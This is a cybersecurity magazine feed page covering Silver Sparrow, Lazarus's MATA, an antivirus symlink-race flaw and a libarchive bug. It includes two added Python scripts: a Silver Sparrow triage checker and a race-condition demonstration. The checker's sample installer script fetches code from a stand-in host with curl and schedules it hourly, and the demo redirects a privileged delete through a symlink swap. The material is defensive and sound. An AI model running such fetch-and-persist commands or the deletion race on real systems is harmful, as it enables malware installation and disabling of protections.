MacOS Archives - CISO MAG | Cyber Security Magazine
Beyond Cyber Security
Feed last updated Mon, 22 Feb 2021 09:51:24 +0000 (en-US)

30,000 Macs Affected by “Silver Sparrow” Mystery Malware
https://staging-cisomagcom.kinsta.cloud/silver-sparrow-malware/
Mon, 22 Feb 2021 09:51:24 +0000

The post 30,000 Macs Affected by “Silver Sparrow” Mystery Malware appeared first on CISO MAG | Cyber Security Magazine.
Apple's platforms have a reputation for strong security. A mystery malware dubbed “Silver Sparrow” has dented that reputation by infecting nearly 30,000 Macs (29,139 to be precise) in 153 countries. Researchers are still trying to understand it because it sits on the infected machines waiting for a payload that has not yet arrived. Normally a payload is dropped after compromise and carries out the malicious activity; that is not what has been observed here.

Analyzing the Silver Sparrow Malware

Red Canary's blog post offers an in-depth analysis of how the malware was discovered, its targets, how it operates, and how it runs on Apple's latest M1 chip. For those who want facts and figures: Silver Sparrow is currently the second known malware family with a build for Apple's M1 silicon. The first was reported a week earlier by security researcher Patrick Wardle of Objective-See.

As per Red Canary, the Silver Sparrow malware has two versions:

Version 1 IOCs

  • File name: updater.pkg (installer package for v1)
  • MD5: 30c9bc7d40454e501c358f77449071aa

Version 2 IOCs

  • File name: update.pkg (installer package for v2)
  • MD5: fdd6fb2b1dfe07b0e57d4cbfef9c8149

[Image: Silver Sparrow malware binaries. Image Credit: Red Canary]

As shown in the above image, one version ships a Mach-O binary compiled for Intel x86_64 processors and the other a Mach-O binary that runs natively on the M1 (arm64) chip. The researchers describe these as “bystander binaries”: when executed they only display the messages “Hello World!” and “You did it!”. As a precaution, Apple has revoked the developer certificates used to sign the packages, which stops new installations from passing Gatekeeper.


Silver Sparrow runs its commands through the JavaScript API of the macOS Installer: the package's Distribution file calls system.run during installation, instead of using the preinstall and postinstall scripts where detection logic usually looks, which makes it harder to spot. The researchers found that the malware checks in with its command-and-control (C2) server once an hour for further instructions, but no instructions or final payload have been observed so far, so the malware stays in a dormant, stealthy state. Another interesting mechanism is its self-removal: the malware checks for the presence of a specific file on disk and, if that file exists, deletes all of its persistence mechanisms and scripts, leaving almost no trail of the attack. Researchers say that the presence of such a mechanism in an otherwise inactive sample is itself a “mystery,” because it suggests the operators were preparing for a quiet, persistent foothold rather than a simple intrude, spread, and exfiltrate operation.

Thankfully, there is still no known indication of damage caused by this malware, but the fact that Red Canary's researchers found these strains on Macs in the wild is worrisome. The complete list of Silver Sparrow IOCs is in Red Canary's blog post.
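The following Python script, added here as an illustration and not part of the original article or of Red Canary's tooling, turns three of the points above into offline triage checks: it matches a package against the two MD5 hashes listed above, it looks for system.run calls in the JavaScript of a .pkg Distribution file, and it flags a LaunchAgent that re-runs a shell or curl every 3600 seconds. The Distribution file and the two LaunchAgent plists are constructed samples; scheduling the hourly C2 check-in through a launchd StartInterval is an assumption of the example, not something the article states.

```python
"""Offline triage checks for the Silver Sparrow indicators described above."""
import hashlib
import plistlib
import re
import xml.etree.ElementTree as ET

# MD5 hashes of the two installer packages, as listed in the article.
IOC_MD5 = {
    "30c9bc7d40454e501c358f77449071aa": "updater.pkg (Silver Sparrow v1)",
    "fdd6fb2b1dfe07b0e57d4cbfef9c8149": "update.pkg (Silver Sparrow v2)",
}


def match_pkg_hash(pkg_bytes: bytes):
    """Return the IOC label if the package hash matches, else None.
    MD5 is adequate for matching a published indicator, but it is not
    collision resistant, so a miss never proves a file is clean."""
    return IOC_MD5.get(hashlib.md5(pkg_bytes).hexdigest())


# Crude first-pass patterns: a real Distribution file may obfuscate the call.
SYSTEM_RUN = re.compile(r"system\.run\s*\(([^)]*)\)")
QUOTED_ARG = re.compile(r"'([^']*)'|\"([^\"]*)\"")


def installer_script_commands(distribution_xml):
    """Return the argument list of every system.run(...) found in the
    <script> elements of a .pkg Distribution file."""
    data = distribution_xml.encode() if isinstance(distribution_xml, str) else distribution_xml
    root = ET.fromstring(data)
    hits = []
    for script in root.iter("script"):
        for call in SYSTEM_RUN.finditer(script.text or ""):
            hits.append([a or b for a, b in QUOTED_ARG.findall(call.group(1))])
    return hits


SHELL_LIKE = {"sh", "bash", "zsh", "curl"}


def hourly_shell_agent(plist_bytes: bytes):
    """Return the command line of a LaunchAgent that runs a shell or curl
    every 3600 s, else None. Assumption (not in the article): the hourly
    C2 check-in is driven by a launchd StartInterval."""
    agent = plistlib.loads(plist_bytes)
    argv = agent.get("ProgramArguments") or ([agent["Program"]] if "Program" in agent else [])
    if not argv:
        return None
    if agent.get("StartInterval") == 3600 and argv[0].rsplit("/", 1)[-1] in SHELL_LIKE:
        return " ".join(argv)
    return None


# Constructed sample inputs; none of this is recovered from the real malware.
SAMPLE_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="2">
  <title>updater</title>
  <script><![CDATA[
    function installationCheck() {
      system.run('/bin/sh', '-c', 'curl -s https://example.invalid/a > /tmp/agent');
      return true;
    }
  ]]></script>
  <pkg-ref id="com.example.updater"/>
</installer-gui-script>
"""

SAMPLE_AGENT = plistlib.dumps({
    "Label": "example.agent",
    "ProgramArguments": ["/bin/sh", "-c", "/tmp/agent"],
    "RunAtLoad": True,
    "StartInterval": 3600,
})

SAMPLE_BENIGN_AGENT = plistlib.dumps({
    "Label": "example.benign",
    "ProgramArguments": ["/usr/bin/true"],
    "StartInterval": 3600,
})


if __name__ == "__main__":
    print(match_pkg_hash(b"not one of the two packages"))
    print(installer_script_commands(SAMPLE_DISTRIBUTION))
    print(hourly_shell_agent(SAMPLE_AGENT))
    print(hourly_shell_agent(SAMPLE_BENIGN_AGENT))
```

In practice, feed `match_pkg_hash` the bytes of a downloaded .pkg, `installer_script_commands` the Distribution file obtained with `pkgutil --expand`, and `hourly_shell_agent` each plist under ~/Library/LaunchAgents; a hit from any of the three is a reason to pull the host for a closer look, not a verdict on its own.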


Lazarus Hacking Group Strikes Again Using New Malware Variant “MATA”
https://staging-cisomagcom.kinsta.cloud/mata-lazarus-hacking-group/
Thu, 23 Jul 2020 14:04:37 +0000

The post Lazarus Hacking Group Strikes Again Using New Malware Variant “MATA” appeared first on CISO MAG | Cyber Security Magazine.
Kaspersky's threat intelligence team has warned about a new malware campaign linked to the infamous North Korean Lazarus hacking group. Dubbed “MATA,” the malware framework targeted e-commerce and IT firms in Poland, Germany, Turkey, Korea, Japan, and India to spread ransomware and steal sensitive information. MATA consists of several components, including a loader, an orchestrator, and plugins, and has builds for Windows, Linux, and macOS.

Researchers stated that the MATA malware campaign began as early as April 2018. “The actor behind this advanced malware framework used it aggressively to infiltrate corporate entities around the world. We identified several victims from our telemetry and figured out the purpose of this malware framework,” the researchers said.

[Image: Image Source: Kaspersky]

How MATA Spreads

According to Kaspersky, the MATA orchestrator loads plugins that run commands on the infected host: they manipulate files and processes, inject DLLs, and create HTTP proxies and tunnels on targeted Windows devices. Once the malware is deployed, the attackers locate databases holding customers' sensitive information and run database queries to extract it.

“During our research, we also found a package containing different MATA files together with a set of hacking tools. In this case, the package was found on a legitimate distribution site, which might indicate that this is the way the malware was distributed. It included a Windows MATA orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server (CVE-2019-3396), a legitimate socat tool and a Linux version of the MATA orchestrator bundled together with a set of plugins,” the researchers added.

The Lazarus Timeline

The Lazarus group has been involved in multiple earlier cyberattacks. In 2018, Kaspersky uncovered AppleJeus, a Lazarus operation to intrude on cryptocurrency exchanges and applications. In December 2019, researchers discovered a fileless malware variant distributed by the group; according to security researchers, it targeted macOS users through fake cryptocurrency trading applications.

Almost Every Antivirus Software Program Can Be Exploited, Researchers Say
https://staging-cisomagcom.kinsta.cloud/almost-every-antivirus-software-program-can-be-exploited-researchers-say/
Thu, 30 Apr 2020 13:34:44 +0000

The post Almost Every Antivirus Software Program Can Be Exploited, Researchers Say appeared first on CISO MAG | Cyber Security Magazine.
A vulnerability class present in almost every antivirus product could have been exploited to disable anti-malware protection and turn the products into destructive tools, security researchers from RACK911 Labs revealed. RACK911 Labs used directory junctions (on Windows) and symlinks (on macOS and Linux) to make antivirus products delete their own files or other critical files. Most of the affected vendors have since fixed the issue in their products.

How the bugs are exploited

Researchers stated that the attack has to be timed precisely: the attacker must know exactly when to swap in the directory junction or symlink. “What most antivirus software fail to take into consideration is the small window of time between the initial file scan that detects the malicious file and the cleanup operation that takes place immediately after. A malicious local user or malware author is often able to perform a race condition via a directory junction (Windows) or a symlink (Linux & macOS) that leverages the privileged file operations to disable the antivirus software or interfere with the operating system to render it useless,” the researchers explained.

The researchers demonstrated their proof-of-concept (PoC) against Norton Internet Security for macOS, downloading the EICAR test string from Pastebin because the product blocks the download of the test string from the official site. They ran the same PoC against McAfee Endpoint Security for Windows and were able to delete the product's EpSecApiLib.dll file.

Affected Antivirus Software

The researchers also published a list of the vulnerable antivirus products (shown in the image below).

[Image: list of affected antivirus products. Image Courtesy: rack911labs]

RACK911 Labs stated that it notified all the affected antivirus vendors about the vulnerabilities in their platforms, and that most of them have since shipped fixes in their products.

“Whether it’s Windows, macOS or Linux, it’s extremely important that file operations happen with the lowest level of authority to prevent attacks from taking place. One must always assume the user is malicious and by performing privileged file operations within reach of the user, it’s opening the door to a wide range of security vulnerabilities,” RACK911 Labs concluded.
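The race described above, reproduced as an added example in Python on Linux or macOS (it is not RACK911's PoC and not part of the original article): a naive cleanup that re-resolves the recorded path at delete time, beside a cleanup that opens the parent directory with O_NOFOLLOW at scan time and unlinks relative to that descriptor. The directory names, the stand-in content of the detected file, and the choice of a file named EpSecApiLib.dll as the target are constructed for the demonstration, and the simulation runs everything as one user, so it shows the redirection rather than the privilege boundary that makes the real attack matter. The descriptor-relative delete is a mitigation chosen for this example in the spirit of RACK911's advice to perform file operations with the least authority; it is not presented as what any vendor shipped.

```python
"""Scan-then-cleanup race: path-string delete versus fd-relative delete."""
import os
import tempfile

DLL = "EpSecApiLib.dll"  # file name taken from the McAfee result described above


def naive_cleanup(detected_path: str) -> None:
    """Vulnerable pattern: the scanner recorded a path string at scan time and
    the privileged cleanup re-resolves it. Every component is walked again, so
    a parent directory swapped for a symlink (or junction) redirects the delete
    to whatever the attacker pointed it at."""
    os.remove(detected_path)


def open_dir_nofollow(path: str) -> int:
    """Open a directory handle that refuses to traverse a symlink at `path`.
    The descriptor pins the directory inode: later renames or symlink swaps of
    the name do not change what operations relative to it touch."""
    return os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY)


def hardened_cleanup(dir_fd: int, name: str) -> None:
    """Remove `name` from the directory that was open at scan time, not from
    whatever the original path happens to resolve to now."""
    if os.sep in name or name in ("", ".", ".."):
        raise ValueError("expected a single path component")
    os.unlink(name, dir_fd=dir_fd)


def simulate(attacker_wins_race: bool, use_dir_fd: bool):
    """Build a throwaway tree, run scan -> (race window) -> cleanup, and return
    (real_dll_survived, detected_file_removed)."""
    with tempfile.TemporaryDirectory() as root:
        av_dir = os.path.join(root, "av_program")   # the product's own files
        user_dir = os.path.join(root, "user_dir")   # attacker-writable location
        os.mkdir(av_dir)
        os.mkdir(user_dir)
        real_dll = os.path.join(av_dir, DLL)
        with open(real_dll, "w") as f:
            f.write("legitimate AV component")
        bait = os.path.join(user_dir, DLL)          # detected file, same name
        with open(bait, "w") as f:
            f.write("constructed stand-in for a detected file")

        # 1. scan: the engine detects `bait` and records either its path string
        #    or a descriptor for its parent directory.
        detected_path = bait
        dir_fd = open_dir_nofollow(user_dir) if use_dir_fd else None

        # 2. window between detection and cleanup: the local attacker renames
        #    the directory away and replaces it with a symlink into av_dir.
        if attacker_wins_race:
            os.rename(user_dir, user_dir + ".old")
            os.symlink(av_dir, user_dir)

        # 3. the (normally privileged) cleanup
        try:
            if use_dir_fd:
                hardened_cleanup(dir_fd, DLL)
            else:
                naive_cleanup(detected_path)
        finally:
            if dir_fd is not None:
                os.close(dir_fd)

        bait_now = os.path.join(user_dir + ".old" if attacker_wins_race else user_dir, DLL)
        return os.path.exists(real_dll), not os.path.lexists(bait_now)


if __name__ == "__main__":
    print("naive, no race:     ", simulate(False, False))
    print("naive, race won:    ", simulate(True, False))
    print("fd-relative, race:  ", simulate(True, True))
```

The dir_fd calls are POSIX-only; on Windows the same idea has to be expressed with directory handles, and junctions must be treated like symlinks. Holding the descriptor from scan to cleanup is what closes the window; opening it only at cleanup time would still fail closed here (O_NOFOLLOW refuses the symlink with ELOOP), but would not help against a swap that happens after the open.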

Libarchive Vulnerability Allows Code Execution on Linux and BSD Distros
https://staging-cisomagcom.kinsta.cloud/libarchive-vulnerability-allows-code-execution-on-linux-and-bsd-distros/
Wed, 06 Nov 2019 12:15:25 +0000

The post Libarchive Vulnerability Allows Code Execution on Linux and BSD Distros appeared first on CISO MAG | Cyber Security Magazine.
Libarchive is a widely used archive and compression library optimized for reading and writing archives in a single streaming pass. That means it can process archives too large to be stored on disk, handling them on the fly as they are read from or written to a network connection or a tape drive.

Google recently disclosed a Libarchive vulnerability, CVE-2019-18408, found by its security researchers using the ClusterFuzz and OSS-Fuzz automated fuzzing tools. It allows an attacker to execute arbitrary code on a system that processes a specially crafted archive file. The library is included by default in Debian, Ubuntu, Gentoo, Arch Linux, FreeBSD (Berkeley Software Distribution), and NetBSD. The vulnerability was made public as several Linux and BSD distributions released patched packages.

The Debian Security Advisory authored by Moritz Muehlenhoff said, “A use-after-free was found in libarchive, a multi-format archive and compression library, which could result in denial of service and potentially, the execution of arbitrary code if a malformed archive is processed.” IBM, in its security bulletin, also mentioned that multiple Libarchive vulnerabilities affected its Watson Explorer, a cognitive and content analysis platform.

Libarchive has also shipped in Microsoft Windows 10 since Insider build 17063 (2017). Similarly, macOS has used Libarchive since 2009, with bsdtar and bsdcpio as the system tar and cpio command-line utilities. bsdtar and bsdcpio offer more features and better performance than many other tar and cpio implementations, which is why they are popular across operating environments. Their features include:

  • Reads a variety of formats, including tar, pax, cpio, zip, xar, lha, ar, cab, mtree, rar, and ISO images.
  • Writes tar, pax, cpio, zip, xar, ar, ISO, mtree, and shar archives.
  • Automatically handles archives compressed with gzip, bzip2, lzip, xz, lzma, or compress.
  • Unique format conversion feature.

Although the bug could have affected a much wider audience, the Libarchive vulnerability reportedly does not affect Apple's and Microsoft's operating systems, which helped with timely containment and a rapid fix.
